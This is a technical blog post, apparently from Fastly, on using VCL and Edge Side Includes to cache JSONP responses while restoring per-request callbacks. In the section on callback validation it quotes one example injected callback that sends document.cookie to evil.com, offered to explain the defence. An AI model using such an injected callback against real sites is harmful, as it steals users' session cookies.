Using ESI, Part 2: Leveraging VCL and ESI to Use JSONP
In my last post about Edge Side Includes (ESI), I discussed how ESI can be used to mix and match cacheable content (such as the front page of an ecommerce site) with uncacheable content (such as a user’s shopping basket on the site). I also explained how you can use ESI to auto-generate dynamic information in data responses. In the example of the ecommerce site, ESI can add location-based information into a JSON (JavaScript Object Notation) response.
In this post, I’m going to discuss how you can leverage ESI and VCL (Varnish Configuration Language, the domain-specific language that powers Fastly’s edge scripting capabilities) to use JSON responses, even when they’re loaded from another site. This is useful in many cases, including various analytics and social sharing instances.
Basic JSONP
JSONP (“JSON with padding”) is a way for web pages to request data from a different domain. Usually this would be prohibited because, for security reasons, web pages enforce a same-origin policy. JSONP takes advantage of the fact that browsers do not enforce the same-origin policy on <script>
tags, which is the reason why you can load external JavaScript libraries such as jQuery:
<script src="//ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
At its core, the concept is very simple: you want an external service (for example, one that keeps track of “like” counts on an article or page) to be able to supply data to you. So, you include a script tag on your page loaded from your service (which I’ll call “likeservice.example.com”) that contains the name of a callback:
<script src="//likeservice.example.com/likes/?item=1234&callback=getCount"></script>
In the example above, likeservice
then returns the JSON and, most importantly, wraps that JSON in a JavaScript call to the getCount
function that you supplied as the callback.
getCount({"name": "Foo", "id": 1234, "count": 7});
Because this response is loaded as a script, the script gets executed and the getCount
function on your page then gets called with the returned JSON. For example, you could make getCount
pop up an alert with the information returned:
function getCount(info) {
alert("The item " + info["name"] + " has a count of " + info["count"]);
}
However, this is more likely to generate some HTML on-the-fly or update a counter element somewhere on the page.
More Sophisticated Uses
That works fine if you want every item you fetch to do the same thing, but if you want each one to do a different thing, then you have to specify a different callback:
<script src="//likeservice.example.com/likes/?item=1234&callback=getCountABCD"></script>
This would then return:
getCountABCD({"name": "Foo", "id": 1234, "count": 7});
Even for the same item (in this example, item ‘1234’), the callback might be different for different pages — for example, if you want the end result to look different on the index page than on the detail page.
Unfortunately, this hurts cache-hit ratios. While the JSON data returned is the same in both cases (and should therefore be cacheable), the JSONP wrapper needs to change, which means that it’s not cacheable.
Solving the “Uncacheable” Problem With ESI
ESI is explicitly designed to mix cacheable and non-cacheable content. It can be used here to solve the uncacheable problem. It looks a little complicated, but the concept is actually quite simple.
First, catch the case where you’re adding the callback. In vcl_recv
:
sub vcl_recv {
....
unset req.http.callback;
if (req.url ~ "[\?&]callback=") {
# Replace the callback with our ESI template
set req.url = regsub(req.url,
"([\?&])callback=[a-zA-Z_][\w\[\]\._]*(&|$)",
{"\1callback=%3Cesi%3Ainclude%20src%3D%22%2Fesi%2Fjsonp-callback%22%2F%3E"});
return(lookup);
}
....
}
It’s a little hard to read because of the regular expressions and the URL encoding, but what you’ve done is change the URL from something like:
/likes/?item=1234&callback=getCountABCD
to an HTML encoded version of this URL:
/likes/?item=1234&callback=<esi:include src="/esi/jsonp-callback"/>
Note how the regular expression to extract the callback is defined. This ensures that the callback starts with either a lower or uppercase letter or an underscore (_), and that the rest of the function name consists only of letters, numbers, underscores, periods (.), or square brackets ([ or ]). This ensures that it’s a legal JavaScript function name and guarantees that no one can insert nasty hacks, like sniffing cookies by setting the callback to something like:
$.get('https://evil.com/'+document.cookie);getCountABCD
Read “Sanitising JSONP Callback Identifiers For Security” and “Security Risks With JSONP” for more information.
The first time the URL gets called, it will be fetched from the origin server, which will dutifully return this JSONP:
<esi:include src="/esi/jsonp-callback"/>({"name": "Foo", "id": 1234, "count": 7});
It should be noted that some web frameworks (Rack, for example) do server side validation of callbacks passed to them. You may need to specifically allow this form of ESI callback.
From that point on, any subsequent calls to /likes/?item=1234
will return a cached copy of the same thing (until the TTL expires or the count for “item 1234” is purged explicitly).
So far, so good. You’ve normalized the JSONP in order to make it cacheable. But you still need to add that original callback back in.
To do that, first you need to turn on ESI processing for the response:
sub vcl_fetch {
if (req.url ~ "[\?&]callback=") {
esi;
# let's only cache this for 300s
set beresp.ttl = 300s;
}
}
Then, catch that call to the JSONP callback:
sub vcl_recv {
....
if (req.url == "/esi/jsonp-callback") {
# Extract the name of the callback from the original url and store it
set req.http.callback = regsub(req.topurl,
"^.*[\?&]callback=([a-zA-Z][\w\[\]\._]*)(&|$)",
"\1");
# Create the synthetic response
error 900 "JSONP ESI";
}
...
}
Next, process that call as a synthetic response:
sub vcl_error {
....
if (obj.status == 900) {
set obj.status = 200;
set obj.response = "OK";
# We add an empty comment at the start in order to
# protect against content sniffing attacks.
# See https://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/
synthetic "/**/ " urldecode(req.http.callback);
return (deliver);
}
....
}
Which will return:
/**/ getCountABCD
Which replaces the ESI tag (the <esi:include src="/esi/jsonp-callback"/>
bit) in the JSONP response.
Wait, What Just Happened?
There’s quite a lot to take in here, so let’s go back and unpack what just happened.
First, you removed the callback:
/likes/?item=1234&callback=getCountABCD
and replaced it with an ESI call:
/likes/?item=1234&callback=<esi:include src="/esi/jsonp-callback"/>
Then, you fetched that URL, which returned some JSONP as a response that included our callback:
<esi:include src="/esi/jsonp-callback"/>({"name": "Foo", "id": 1234, "count": 7});
Next, you processed and replaced the ESI call with some synthetic content, which you made to be the original callback. The net result is that the ESI call gets replaced, and you end up with:
/**/ getCountABCD({"name": "Foo", "id": 1234, "count": 7});
And yet, apart from the initial fetch for the count when there’s a cache miss, there are no calls back to origin — no matter what the callback is. So, you get all the flexibility you want, but still keep your cache hit ratio up.
In Summary
Web content comes in all shapes and sizes, which can make caching content increasingly complicated. But VCL is an incredibly powerful tool — it can tell which parts of your data are dynamic and which are relatively static. This means you can actually cache far more than you might have originally thought possible.
Putting It All Together
For the sake of clarity, let’s collect all the different parts together in a single VCL file. You can recreate this either by creating objects in Fastly’s app, or you can use this as a VCL file and upload it:
sub vcl_recv {
unset req.http.callback;
if (req.url ~ "[\?&]callback=") {
# Replace the callback with our ESI template
set req.url = regsub(req.url,
"([\?&])callback=[a-zA-Z_][\w\[\]\._]*(&|$)",
{"\1callback=%3Cesi%3Ainclude%20src%3D%22%2Fesi%2Fjsonp-callback%22%2F%3E"});
return(lookup);
}
if (req.url == "/esi/jsonp-callback") {
# Extract the name of the callback from the original url and store it
set req.http.callback = regsub(req.topurl,
"^.*[\?&]callback=([a-zA-Z]+[\w\[\]\._]+)(&|$)",
"\1");
# Create the synthetic response
error 900 "JSONP ESI";
}
#FASTLY recv
}
sub vcl_fetch {
if (req.url ~ "[\?&]callback=") {
esi;
# let's only cache this for 300s
set beresp.ttl = 300s;
}
#FASTLY fetch
}
sub vcl_error {
if (obj.status == 900) {
set obj.status = 200;
set obj.response = "OK";
# We add an empty comment at the start in order to
# protect against content sniffing attacks.
# See https://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/
synthetic "/**/ " urldecode(req.http.callback);
return (deliver);
}
#FASTLY error
}